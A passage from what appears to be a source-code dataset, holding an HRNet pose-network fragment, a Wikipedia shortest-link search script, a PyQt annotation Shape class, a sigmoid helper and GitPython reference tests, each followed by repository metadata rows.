                            nn.ReLU(inplace=True)
                        )
                    )
                else:
                    transition_layers.append(None)
            else:
                conv3x3s = []
                for j in range(i + 1 - num_branches_pre):
                    inchannels = num_channels_pre_layer[-1]
                    # Only the last conv of the chain changes the width.
                    outchannels = num_channels_cur_layer[i] \
                        if j == i - num_branches_pre else inchannels
                    conv3x3s.append(
                        nn.Sequential(
                            nn.Conv2d(
                                inchannels, outchannels, 3, 2, 1, bias=False
                            ),
                            nn.BatchNorm2d(outchannels),
                            nn.ReLU(inplace=True)
                        )
                    )
                transition_layers.append(nn.Sequential(*conv3x3s))

        return nn.ModuleList(transition_layers)

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack `blocks` residual blocks, projecting the skip when needed."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(
                    self.inplanes, planes * block.expansion,
                    kernel_size=1, stride=stride, bias=False
                ),
                nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
            )

        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))

        return nn.Sequential(*layers)

    def _make_stage(self, layer_config, num_inchannels,
                    multi_scale_output=True):
        """Chain NUM_MODULES HighResolutionModules into one stage.

        Returns the stage as nn.Sequential plus its per-branch output widths.
        """
        num_modules = layer_config['NUM_MODULES']
        num_branches = layer_config['NUM_BRANCHES']
        num_blocks = layer_config['NUM_BLOCKS']
        num_channels = layer_config['NUM_CHANNELS']
        block = blocks_dict[layer_config['BLOCK']]
        fuse_method = layer_config['FUSE_METHOD']

        modules = []
        for i in range(num_modules):
            # multi_scale_output is only used by the last module
            if not multi_scale_output and i == num_modules - 1:
                reset_multi_scale_output = False
            else:
                reset_multi_scale_output = True

            modules.append(
                HighResolutionModule(
                    num_branches,
                    block,
                    num_blocks,
                    num_inchannels,
                    num_channels,
                    fuse_method,
                    reset_multi_scale_output
                )
            )
            num_inchannels = modules[-1].get_num_inchannels()

        return nn.Sequential(*modules), num_inchannels

    def forward(self, x):
        """(N, 3, H, W) image batch -> (N, NUM_JOINTS, H/4, W/4) heatmaps."""
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.conv2(x)
        x = self.bn2(x)
        x = self.relu(x)
        x = self.layer1(x)

        # Each stage: adapt branch inputs via its transition, then run it.
        x_list = []
        for i in range(self.stage2_cfg['NUM_BRANCHES']):
            if self.transition1[i] is not None:
                x_list.append(self.transition1[i](x))
            else:
                x_list.append(x)
        y_list = self.stage2(x_list)

        x_list = []
        for i in range(self.stage3_cfg['NUM_BRANCHES']):
            if self.transition2[i] is not None:
                # New branches are derived from the lowest-resolution output.
                x_list.append(self.transition2[i](y_list[-1]))
            else:
                x_list.append(y_list[i])
        y_list = self.stage3(x_list)

        x_list = []
        for i in range(self.stage4_cfg['NUM_BRANCHES']):
            if self.transition3[i] is not None:
                x_list.append(self.transition3[i](y_list[-1]))
            else:
                x_list.append(y_list[i])
        y_list = self.stage4(x_list)

        x = self.final_layer(y_list[0])

        return x

    def init_weights(self, pretrained=''):
        """Initialize conv/BN weights, then overlay a pretrained checkpoint.

        Raises ValueError when `pretrained` is non-empty but not a file.
        """
        logger.info('=> init weights from normal distribution')
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                nn.init.normal_(m.weight, std=0.001)
                for name, _ in m.named_parameters():
                    if name in ['bias']:
                        nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
            elif isinstance(m, nn.ConvTranspose2d):
                nn.init.normal_(m.weight, std=0.001)
                for name, _ in m.named_parameters():
                    if name in ['bias']:
                        nn.init.constant_(m.bias, 0)

        if os.path.isfile(pretrained):
            pretrained_state_dict = torch.load(pretrained)
            logger.info('=> loading pretrained model {}'.format(pretrained))

            need_init_state_dict = {}
            for name, m in pretrained_state_dict.items():
                # BUG FIX: was `self.pretrained_layers[0] is '*'` — identity
                # comparison against a str literal (SyntaxWarning on 3.8+ and
                # not guaranteed true); equality is what the '*' wildcard means.
                if name.split('.')[0] in self.pretrained_layers \
                        or self.pretrained_layers[0] == '*':
                    need_init_state_dict[name] = m
            self.load_state_dict(need_init_state_dict, strict=False)
        elif pretrained:
            logger.error('=> please download pre-trained models first!')
            raise ValueError('{} does not exist!'.format(pretrained))
def get_pose_net(cfg, is_train, **kwargs):
    """Construct a PoseHighResolutionNet; init weights when training."""
    net = PoseHighResolutionNet(cfg, **kwargs)
    if is_train and cfg['MODEL']['INIT_WEIGHTS']:
        net.init_weights(cfg['MODEL']['PRETRAINED'])
    return net
| 36.204819
| 93
| 0.523849
|
4a0ebf32a498f4199f6c07c86166b766b7542b2c
| 3,911
|
py
|
Python
|
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | 3
|
2020-01-20T19:03:06.000Z
|
2020-06-10T02:42:29.000Z
|
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | null | null | null |
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/python3
from bs4 import BeautifulSoup
from multiprocessing import Pool
from sys import stdout
from urllib.parse import urljoin, quote
from urllib.request import urlopen
import argparse
import os
import traceback
# Command line: which Wikipedia to search plus the start/end article names.
parser = argparse.ArgumentParser()
parser.add_argument('cc', help='Country code for your Wikipedia (e.g. en, de)')
parser.add_argument('start', metavar='from', help='Name of the article you start with')
parser.add_argument('end', metavar='to', help='Name of the destination article')
args = parser.parse_args()

# Base URL of the chosen Wikipedia; URL-encoded article names are appended.
wikiurl = 'https://'+args.cc+'.wikipedia.org/wiki/'
def urlencode(text):
    """Convert an article title to its URL path form (spaces become '_')."""
    underscored = text.replace(" ", "_")
    return quote(underscored)
class Page:
    """A wiki article: fetched lazily, tracking its title, the route that
    reached it, and links to child pages."""

    def __init__(self, url):
        self.url = url
        self.fetched = False
        self.children = []
        # Placeholder title ('?' prefix) until the page has been fetched.
        self.title = "?"+url.rsplit("/", 1)[-1]
        self.processed = False
        self.route = []

    def fetch(self) -> None:
        """Download the article; fill in its real title and in-wiki links."""
        if self.fetched:
            return
        self.fetched = True
        html = urlopen(self.url).read()
        document = BeautifulSoup(html, features="lxml")
        self.title = str(document.find_all(id="firstHeading")[0].contents[0])
        # BUG FIX: the original did this find_all twice (an unused `article`
        # binding next to `body`); one lookup suffices.
        body = document.find_all(id="mw-content-text")[0]
        # Keep only same-wiki article links: strip anchors, skip special
        # namespace pages (those contain ':').
        self.children = [
            get_page_cached(urljoin(self.url, a["href"].rsplit("#", 1)[0]))
            for a in body.find_all("a")
            if a.has_attr("href")
            and a["href"].startswith("/wiki/")
            and ':' not in a["href"]
        ]

    def fetch_async(self):
        """fetch() wrapper for worker pools: log failures instead of raising.

        BUG FIX: narrowed the bare `except:` to `except Exception:` so
        KeyboardInterrupt/SystemExit can still terminate the worker.
        """
        try:
            self.fetch()
        except Exception:
            traceback.print_exc()
        return self
# Cache of every Page seen so far, keyed by canonical URL.
known_pages = {}


def get_page_cached(url: str) -> Page:
    """Return the cached Page for *url*, or a fresh (uncached) one."""
    try:
        return known_pages[url]
    except KeyError:
        return Page(url)
def print_line(text: str) -> None:
    """Print *text*, truncating it to the terminal width.

    A truncated line ends with '... <original length>'.
    """
    width = os.get_terminal_size().columns
    if len(text) > width:
        suffix = "... " + str(len(text))
        text = text[:width - len(suffix)] + suffix
    print(text)
def route_to_str(path) -> str:
    """Render a route as 'a -> b -> c' (empty string for an empty route).

    Replaces a manual first-element loop with str.join; also drops the
    original's bogus `path: []` annotation (a list literal, not a type).
    """
    return " -> ".join(path)
# Resolve the start and end articles to canonical URLs.
surl = wikiurl+urlencode(args.start)
eurl = wikiurl+urlencode(args.end)

# Crash if start or end article does not exist
startpage = get_page_cached(surl)
endpage = get_page_cached(eurl)
startpage.fetch()
endpage.fetch()

# Worker pool fetches pages concurrently; `queue` holds AsyncResults in FIFO
# order, so the search is breadth-first and the first route found is a
# shortest one (by hop count).
pool = Pool()
queue = [pool.apply_async(startpage.fetch_async, [])]
known_pages[surl] = startpage
# Unfetched children carry a '?'-prefixed placeholder title, hence the
# "?"+qend comparison below.
qend = urlencode(endpage.title)
shortest = []
count = 0

print("FROM:\t"+startpage.title)
print("TO:\t"+endpage.title)
print("")

while len(queue) > 0:
    count += 1
    # Block on the oldest outstanding fetch (keeps the BFS order).
    page = queue[0].get()
    queue = queue[1:]
    if page.processed:
        continue
    page.processed = True
    route = page.route + [page.title]
    ctitles = [child.title for child in page.children]
    if "?"+qend in ctitles:
        # A not-yet-fetched child link looks like the target; fetch it to
        # confirm (redirects can make the real title differ).
        print("Possible hit!")
        child = [c for c in page.children if c.title == "?"+qend][0]
        print("> "+child.title)
        child.fetch()
        if child.title == endpage.title:
            shortest = route + [child.title]
            break
    if page.title == endpage.title:
        shortest = route
        break
    old = len(queue)
    # Enqueue unseen links only, recording the route that reached them.
    for child in page.children:
        if not child.url in known_pages:
            child.route = route
            known_pages[child.url] = child
            queue += [pool.apply_async(child.fetch_async, [])]
    # Progress: pages done | queue size | newly queued/children (%) | route.
    print_line(str(count) + " | "+ str(len(queue)) + " | " + str(len(queue)-old) + "/" + str(len(page.children)) + " ("+ "%.f" % (0 if len(page.children) == 0 else 100*(len(queue)-old)/len(page.children)) +"%) | " + route_to_str(route) + " -> "+str(ctitles))

print("\n")

if shortest == []:
    print("No route found")
    exit(1)

print(route_to_str(shortest))

# Kill all remaining fetch calls
pool.terminate()
| 26.248322
| 258
| 0.610841
|
4a0ebf840a213672ae1a3485f8163b6f082749f4
| 6,511
|
py
|
Python
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 3
|
2020-07-21T02:45:57.000Z
|
2021-02-27T10:49:13.000Z
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 1
|
2020-08-26T18:04:00.000Z
|
2020-08-27T14:10:37.000Z
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 1
|
2022-01-31T04:43:57.000Z
|
2022-01-31T04:43:57.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
except ImportError:
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from libs.utils import distance
import sys
DEFAULT_LINE_COLOR = QColor(0, 255, 0, 128)
DEFAULT_FILL_COLOR = QColor(255, 0, 0, 128)
DEFAULT_SELECT_LINE_COLOR = QColor(255, 255, 255)
DEFAULT_SELECT_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_VERTEX_FILL_COLOR = QColor(0, 255, 0, 255)
DEFAULT_HVERTEX_FILL_COLOR = QColor(255, 0, 0)
MIN_Y_LABEL = 10
class Shape(object):
    """A labelled polygon annotation (at most four vertices) that can paint
    itself, hit-test points, and highlight vertices on the canvas."""

    P_SQUARE, P_ROUND = range(2)

    MOVE_VERTEX, NEAR_VERTEX = range(2)

    # The following class variables influence the drawing
    # of _all_ shape objects.
    line_color = DEFAULT_LINE_COLOR
    fill_color = DEFAULT_FILL_COLOR
    select_line_color = DEFAULT_SELECT_LINE_COLOR
    select_fill_color = DEFAULT_SELECT_FILL_COLOR
    vertex_fill_color = DEFAULT_VERTEX_FILL_COLOR
    hvertex_fill_color = DEFAULT_HVERTEX_FILL_COLOR
    point_type = P_ROUND
    point_size = 8
    scale = 1.0

    def __init__(self, label=None, line_color=None, difficult=False, paintLabel=False):
        self.label = label
        self.points = []
        self.fill = False
        self.selected = False
        self.difficult = difficult
        self.paintLabel = paintLabel

        self._highlightIndex = None
        self._highlightMode = self.NEAR_VERTEX
        # (size multiplier, point shape) applied to the highlighted vertex.
        self._highlightSettings = {
            self.NEAR_VERTEX: (4, self.P_ROUND),
            self.MOVE_VERTEX: (1.5, self.P_SQUARE),
        }

        self._closed = False

        if line_color is not None:
            # Override the class line_color attribute
            # with an object attribute. Currently this
            # is used for drawing the pending line a different color.
            self.line_color = line_color

    def close(self):
        self._closed = True

    def reachMaxPoints(self):
        # IDIOM FIX: collapsed if/return-True/return-False to one expression.
        return len(self.points) >= 4

    def addPoint(self, point):
        if not self.reachMaxPoints():
            self.points.append(point)

    def popPoint(self):
        if self.points:
            return self.points.pop()
        return None

    def isClosed(self):
        return self._closed

    def setOpen(self):
        self._closed = False

    def paint(self, painter):
        """Draw the outline, vertices, optional label and optional fill."""
        if self.points:
            color = self.select_line_color if self.selected else self.line_color
            pen = QPen(color)
            # Try using integer sizes for smoother drawing(?)
            pen.setWidth(max(1, int(round(2.0 / self.scale))))
            painter.setPen(pen)

            line_path = QPainterPath()
            vrtx_path = QPainterPath()

            line_path.moveTo(self.points[0])
            # Uncommenting the following line will draw 2 paths
            # for the 1st vertex, and make it non-filled, which
            # may be desirable.
            # self.drawVertex(vrtx_path, 0)

            for i, p in enumerate(self.points):
                line_path.lineTo(p)
                self.drawVertex(vrtx_path, i)
            if self.isClosed():
                line_path.lineTo(self.points[0])

            painter.drawPath(line_path)
            painter.drawPath(vrtx_path)
            painter.fillPath(vrtx_path, self.vertex_fill_color)

            # Draw text at the top-left
            if self.paintLabel:
                min_x = sys.maxsize
                min_y = sys.maxsize
                for point in self.points:
                    min_x = min(min_x, point.x())
                    min_y = min(min_y, point.y())
                if min_x != sys.maxsize and min_y != sys.maxsize:
                    font = QFont()
                    font.setPointSize(8)
                    font.setBold(True)
                    painter.setFont(font)
                    # BUG FIX: was `if(self.label == None)` — use `is None`
                    # for the None check (equality calls __eq__).
                    if self.label is None:
                        self.label = ""
                    if min_y < MIN_Y_LABEL:
                        min_y += MIN_Y_LABEL
                    painter.drawText(min_x, min_y, self.label)

            if self.fill:
                color = self.select_fill_color if self.selected else self.fill_color
                painter.fillPath(line_path, color)

    def drawVertex(self, path, i):
        """Append vertex i to *path*, enlarged/reshaped when highlighted."""
        d = self.point_size / self.scale
        shape = self.point_type
        point = self.points[i]
        if i == self._highlightIndex:
            size, shape = self._highlightSettings[self._highlightMode]
            d *= size
        if self._highlightIndex is not None:
            self.vertex_fill_color = self.hvertex_fill_color
        else:
            self.vertex_fill_color = Shape.vertex_fill_color
        if shape == self.P_SQUARE:
            path.addRect(point.x() - d / 2, point.y() - d / 2, d, d)
        elif shape == self.P_ROUND:
            path.addEllipse(point, d / 2.0, d / 2.0)
        else:
            assert False, "unsupported vertex shape"

    def nearestVertex(self, point, epsilon):
        """Index of the first vertex within *epsilon* of *point*, else None."""
        for i, p in enumerate(self.points):
            if distance(p - point) <= epsilon:
                return i
        return None

    def containsPoint(self, point):
        return self.makePath().contains(point)

    def makePath(self):
        path = QPainterPath(self.points[0])
        for p in self.points[1:]:
            path.lineTo(p)
        return path

    def boundingRect(self):
        return self.makePath().boundingRect()

    def moveBy(self, offset):
        self.points = [p + offset for p in self.points]

    def moveVertexBy(self, i, offset):
        self.points[i] = self.points[i] + offset

    def highlightVertex(self, i, action):
        self._highlightIndex = i
        self._highlightMode = action

    def highlightClear(self):
        self._highlightIndex = None

    def copy(self):
        """Return a deep-enough copy (points list is copied, points shared)."""
        shape = Shape("%s" % self.label)
        shape.points = [p for p in self.points]
        shape.fill = self.fill
        shape.selected = self.selected
        shape._closed = self._closed
        if self.line_color != Shape.line_color:
            shape.line_color = self.line_color
        if self.fill_color != Shape.fill_color:
            shape.fill_color = self.fill_color
        shape.difficult = self.difficult
        return shape

    def __len__(self):
        return len(self.points)

    def __getitem__(self, key):
        return self.points[key]

    def __setitem__(self, key, value):
        self.points[key] = value
| 31.454106
| 87
| 0.590232
|
4a0ebf9e9875618da5760a6dd168d15b73e3fccc
| 173
|
py
|
Python
|
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
# Author: Reuben Unicruz
# Date: 4/9/2019
import math
# Sigmoid logistical function
def sigmoid(x):
    """Numerically stable logistic function 1 / (1 + e^-x).

    BUG FIX: the naive form raises OverflowError in math.exp(-x) for large
    negative x (e.g. x = -1000); branching on the sign keeps the exponent
    passed to exp() non-positive, so it can only underflow to 0.0.
    """
    if x >= 0:
        return 1.0 / (1.0 + math.exp(-x))
    ex = math.exp(x)
    return ex / (1.0 + ex)


print(sigmoid(1))
| 14.416667
| 34
| 0.601156
|
4a0ebfdedd00041c78110ce20f6b8ef9c1f29528
| 23,277
|
py
|
Python
|
venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 1
|
2020-08-13T12:21:56.000Z
|
2020-08-13T12:21:56.000Z
|
venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 5
|
2021-03-19T11:01:43.000Z
|
2022-02-10T12:02:58.000Z
|
venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 1
|
2020-11-01T04:03:38.000Z
|
2020-11-01T04:03:38.000Z
|
# test_refs.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
from itertools import chain
from git import (
Reference,
Head,
TagReference,
RemoteReference,
Commit,
SymbolicReference,
GitCommandError,
RefLog
)
from git.objects.tag import TagObject
from git.test.lib import (
TestBase,
with_rw_repo
)
from git.util import Actor
import git.refs as refs
import os.path as osp
class TestRefs(TestBase):
def test_from_path(self):
    """Every ref type round-trips through to_full_path/from_path."""
    # should be able to create any reference directly
    for ref_type in (Reference, Head, TagReference, RemoteReference):
        for rela_name in ('rela_name', 'path/rela_name'):
            path = ref_type.to_full_path(rela_name)
            ref = ref_type.from_path(self.rorepo, path)
            assert isinstance(ref, ref_type)

    # tag paths are validated unless the check is explicitly disabled
    self.assertRaises(ValueError, TagReference, self.rorepo, "refs/invalid/tag")
    TagReference(self.rorepo, "refs/invalid/tag", check_path=False)
def test_tag_base(self):
    """Tag refs expose their commit and, when annotated, a full TagObject."""
    tag_object_refs = []
    for tag in self.rorepo.tags:
        assert "refs/tags" in tag.path
        assert tag.name
        assert isinstance(tag.commit, Commit)
        # tag.tag is the annotated tag object, or None for lightweight tags.
        if tag.tag is not None:
            tag_object_refs.append(tag)
            tagobj = tag.tag
            # have no dict
            self.assertRaises(AttributeError, setattr, tagobj, 'someattr', 1)
            assert isinstance(tagobj, TagObject)
            assert tagobj.tag == tag.name
            assert isinstance(tagobj.tagger, Actor)
            assert isinstance(tagobj.tagged_date, int)
            assert isinstance(tagobj.tagger_tz_offset, int)
            assert tagobj.message
            assert tag.object == tagobj
            # can't assign the object
            self.assertRaises(AttributeError, setattr, tag, 'object', tagobj)
        # END if we have a tag object
    # END for tag in repo-tags
    # at least one annotated tag must exist in the fixture repository
    assert tag_object_refs
    assert isinstance(self.rorepo.tags['0.1.5'], TagReference)
def test_tags_author(self):
    """The tagger recorded on the first tag object is a known Actor."""
    tagobj = self.rorepo.tags[0].tag
    assert isinstance(tagobj.tagger, Actor)
    assert tagobj.tagger.name == 'Michael Trier'
def test_tags(self):
    """Tag and head refs are hashable, self-equal Reference instances."""
    # tag refs can point to tag objects or to commits
    seen = set()
    total = 0
    for ref in chain(self.rorepo.tags, self.rorepo.heads):
        total += 1
        assert isinstance(ref, refs.Reference)
        assert str(ref) == ref.name
        assert repr(ref)
        assert ref == ref
        assert not ref != ref
        seen.add(ref)
    # END for each ref
    assert len(seen) == total
    assert len(seen | seen) == total
@with_rw_repo('HEAD', bare=False)
def test_heads(self, rwrepo):
    """Heads: identity/config/tracking behaviour, then reflog bookkeeping."""
    for head in rwrepo.heads:
        assert head.name
        assert head.path
        assert "refs/heads" in head.path
        prev_object = head.object
        cur_object = head.object
        assert prev_object == cur_object  # represent the same git object
        assert prev_object is not cur_object  # but are different instances

        # per-branch config values round-trip through writer and reader
        with head.config_writer() as writer:
            tv = "testopt"
            writer.set_value(tv, 1)
            assert writer.get_value(tv) == 1
        assert head.config_reader().get_value(tv) == 1
        with head.config_writer() as writer:
            writer.remove_option(tv)

        # after the clone, we might still have a tracking branch setup
        head.set_tracking_branch(None)
        assert head.tracking_branch() is None
        remote_ref = rwrepo.remotes[0].refs[0]
        assert head.set_tracking_branch(remote_ref) is head
        assert head.tracking_branch() == remote_ref
        head.set_tracking_branch(None)
        assert head.tracking_branch() is None

        # tracking works even with '#' (a gitconfig comment char) in the name
        special_name = 'feature#123'
        special_name_remote_ref = SymbolicReference.create(rwrepo, 'refs/remotes/origin/%s' % special_name)
        gp_tracking_branch = rwrepo.create_head('gp_tracking#123')
        special_name_remote_ref = rwrepo.remotes[0].refs[special_name]  # get correct type
        gp_tracking_branch.set_tracking_branch(special_name_remote_ref)
        assert gp_tracking_branch.tracking_branch().path == special_name_remote_ref.path

        # the same association made through 'git branch -u' is read back
        git_tracking_branch = rwrepo.create_head('git_tracking#123')
        rwrepo.git.branch('-u', special_name_remote_ref.name, git_tracking_branch.name)
        assert git_tracking_branch.tracking_branch().name == special_name_remote_ref.name
    # END for each head

    # verify REFLOG gets altered
    head = rwrepo.head
    cur_head = head.ref
    cur_commit = cur_head.commit
    pcommit = cur_head.commit.parents[0].parents[0]
    hlog_len = len(head.log())
    blog_len = len(cur_head.log())
    assert head.set_reference(pcommit, 'detached head') is head
    # one new log-entry
    thlog = head.log()
    assert len(thlog) == hlog_len + 1
    assert thlog[-1].oldhexsha == cur_commit.hexsha
    assert thlog[-1].newhexsha == pcommit.hexsha

    # the ref didn't change though
    assert len(cur_head.log()) == blog_len

    # head changes once again, cur_head doesn't change
    head.set_reference(cur_head, 'reattach head')
    assert len(head.log()) == hlog_len + 2
    assert len(cur_head.log()) == blog_len

    # adjusting the head-ref also adjust the head, so both reflogs are
    # altered
    cur_head.set_commit(pcommit, 'changing commit')
    assert len(cur_head.log()) == blog_len + 1
    assert len(head.log()) == hlog_len + 3

    # with automatic dereferencing
    assert head.set_commit(cur_commit, 'change commit once again') is head
    assert len(head.log()) == hlog_len + 4
    assert len(cur_head.log()) == blog_len + 2

    # a new branch has just a single entry
    other_head = Head.create(rwrepo, 'mynewhead', pcommit, logmsg='new head created')
    log = other_head.log()
    assert len(log) == 1
    assert log[0].oldhexsha == pcommit.NULL_HEX_SHA
    assert log[0].newhexsha == pcommit.hexsha
def test_refs(self):
    """repo.refs mixes at least three distinct reference types."""
    found_types = {type(ref) for ref in self.rorepo.refs}
    assert len(found_types) >= 3
def test_is_valid(self):
    """is_valid() is True only for refs that actually exist on disk."""
    assert not Reference(self.rorepo, 'refs/doesnt/exist').is_valid()
    head = self.rorepo.head
    assert head.is_valid()
    assert head.reference.is_valid()
    assert not SymbolicReference(self.rorepo, 'hellothere').is_valid()
def test_orig_head(self):
    """orig_head() yields exactly a SymbolicReference (not a subclass)."""
    orig = self.rorepo.head.orig_head()
    assert type(orig) == SymbolicReference
@with_rw_repo('0.1.6')
def test_head_checkout_detached_head(self, rw_repo):
    """Checking out a remote ref yields a detached symbolic HEAD."""
    checked_out = rw_repo.remotes.origin.refs.master.checkout()
    assert isinstance(checked_out, SymbolicReference)
    assert checked_out.name == 'HEAD'
@with_rw_repo('0.1.6')
def test_head_reset(self, rw_repo):
    """Exercise the full reference API against a writable repository.

    Covers, in order: head resets (index / working-tree / paths), attaching
    and detaching HEAD, Head creation/rename/delete, tag creation (light and
    annotated) and deletion, remote-reference deletion, direct commit/object
    assignment on refs, branch checkout, Reference and SymbolicReference
    creation/rename/delete, packed-ref listing, and bulk ref iteration.
    NOTE(review): statements mutate shared repo state, so their order matters.
    """
    cur_head = rw_repo.head
    old_head_commit = cur_head.commit
    new_head_commit = cur_head.ref.commit.parents[0]
    cur_head.reset(new_head_commit, index=True)  # index only
    assert cur_head.reference.commit == new_head_commit

    # working_tree=True requires index=True as well
    self.assertRaises(ValueError, cur_head.reset, new_head_commit, index=False, working_tree=True)
    new_head_commit = new_head_commit.parents[0]
    cur_head.reset(new_head_commit, index=True, working_tree=True)  # index + wt
    assert cur_head.reference.commit == new_head_commit

    # paths - make sure we have something to do
    rw_repo.index.reset(old_head_commit.parents[0])
    cur_head.reset(cur_head, paths="test")
    cur_head.reset(new_head_commit, paths="lib")
    # hard resets with paths don't work, its all or nothing
    self.assertRaises(GitCommandError, cur_head.reset, new_head_commit, working_tree=True, paths="lib")

    # we can do a mixed reset, and then checkout from the index though
    cur_head.reset(new_head_commit)
    rw_repo.index.checkout(["lib"], force=True)

    # now that we have a writable repo, change the HEAD reference - its
    # like git-reset --soft
    heads = rw_repo.heads
    assert heads
    for head in heads:
        cur_head.reference = head
        assert cur_head.reference == head
        assert isinstance(cur_head.reference, Head)
        assert cur_head.commit == head.commit
        assert not cur_head.is_detached
    # END for each head

    # detach HEAD by pointing it directly at a commit
    active_head = heads[0]
    curhead_commit = active_head.commit
    cur_head.reference = curhead_commit
    assert cur_head.commit == curhead_commit
    assert cur_head.is_detached
    # a detached head has no 'reference' to query
    self.assertRaises(TypeError, getattr, cur_head, "reference")

    # tags are references, hence we can point to them
    some_tag = rw_repo.tags[0]
    cur_head.reference = some_tag
    assert not cur_head.is_detached
    assert cur_head.commit == some_tag.commit
    assert isinstance(cur_head.reference, TagReference)

    # put HEAD back to a real head, otherwise everything else fails
    cur_head.reference = active_head

    # type check: only refs/commits may be assigned, not arbitrary strings
    self.assertRaises(ValueError, setattr, cur_head, "reference", "that")

    # head handling
    commit = 'HEAD'
    prev_head_commit = cur_head.commit
    for count, new_name in enumerate(("my_new_head", "feature/feature1")):
        actual_commit = commit + "^" * count
        new_head = Head.create(rw_repo, new_name, actual_commit)
        assert new_head.is_detached
        assert cur_head.commit == prev_head_commit
        assert isinstance(new_head, Head)
        # already exists, but has the same value, so its fine
        Head.create(rw_repo, new_name, new_head.commit)

        # its not fine with a different value
        self.assertRaises(OSError, Head.create, rw_repo, new_name, new_head.commit.parents[0])

        # force it
        new_head = Head.create(rw_repo, new_name, actual_commit, force=True)
        old_path = new_head.path
        old_name = new_head.name

        # rename round-trip: simple name, nested name, back to original
        assert new_head.rename("hello").name == "hello"
        assert new_head.rename("hello/world").name == "hello/world"
        assert new_head.rename(old_name).name == old_name and new_head.path == old_path

        # rename with force
        tmp_head = Head.create(rw_repo, "tmphead")
        self.assertRaises(GitCommandError, tmp_head.rename, new_head)
        tmp_head.rename(new_head, force=True)
        assert tmp_head == new_head and tmp_head.object == new_head.object

        logfile = RefLog.path(tmp_head)
        assert osp.isfile(logfile)
        Head.delete(rw_repo, tmp_head)
        # deletion removes the log as well
        assert not osp.isfile(logfile)
        heads = rw_repo.heads
        assert tmp_head not in heads and new_head not in heads
        # force on deletion testing would be missing here, code looks okay though ;)
    # END for each new head name
    self.assertRaises(TypeError, RemoteReference.create, rw_repo, "some_name")

    # tag ref
    tag_name = "5.0.2"
    TagReference.create(rw_repo, tag_name)
    # creating a tag that already exists fails unless forced
    self.assertRaises(GitCommandError, TagReference.create, rw_repo, tag_name)
    light_tag = TagReference.create(rw_repo, tag_name, "HEAD~1", force=True)
    assert isinstance(light_tag, TagReference)
    assert light_tag.name == tag_name
    assert light_tag.commit == cur_head.commit.parents[0]
    # a lightweight tag carries no tag object
    assert light_tag.tag is None

    # tag with tag object
    other_tag_name = "releases/1.0.2RC"
    msg = "my mighty tag\nsecond line"
    obj_tag = TagReference.create(rw_repo, other_tag_name, message=msg)
    assert isinstance(obj_tag, TagReference)
    assert obj_tag.name == other_tag_name
    assert obj_tag.commit == cur_head.commit
    assert obj_tag.tag is not None

    TagReference.delete(rw_repo, light_tag, obj_tag)
    tags = rw_repo.tags
    assert light_tag not in tags and obj_tag not in tags

    # remote deletion
    remote_refs_so_far = 0
    remotes = rw_repo.remotes
    assert remotes
    for remote in remotes:
        refs = remote.refs

        # If a HEAD exists, it must be deleted first. Otherwise it might
        # end up pointing to an invalid ref if the ref was deleted before.
        remote_head_name = "HEAD"
        if remote_head_name in refs:
            RemoteReference.delete(rw_repo, refs[remote_head_name])
            del(refs[remote_head_name])
        # END handle HEAD deletion

        RemoteReference.delete(rw_repo, *refs)
        remote_refs_so_far += len(refs)
        for ref in refs:
            assert ref.remote_name == remote.name
        # END for each ref to delete
    assert remote_refs_so_far
    for remote in remotes:
        # remotes without references should produce an empty list
        self.assertEqual(remote.refs, [])
    # END for each remote

    # change where the active head points to
    if cur_head.is_detached:
        cur_head.reference = rw_repo.heads[0]

    head = cur_head.reference
    old_commit = head.commit
    head.commit = old_commit.parents[0]
    assert head.commit == old_commit.parents[0]
    assert head.commit == cur_head.commit
    head.commit = old_commit

    # setting a non-commit as commit fails, but succeeds as object
    head_tree = head.commit.tree
    self.assertRaises(ValueError, setattr, head, 'commit', head_tree)
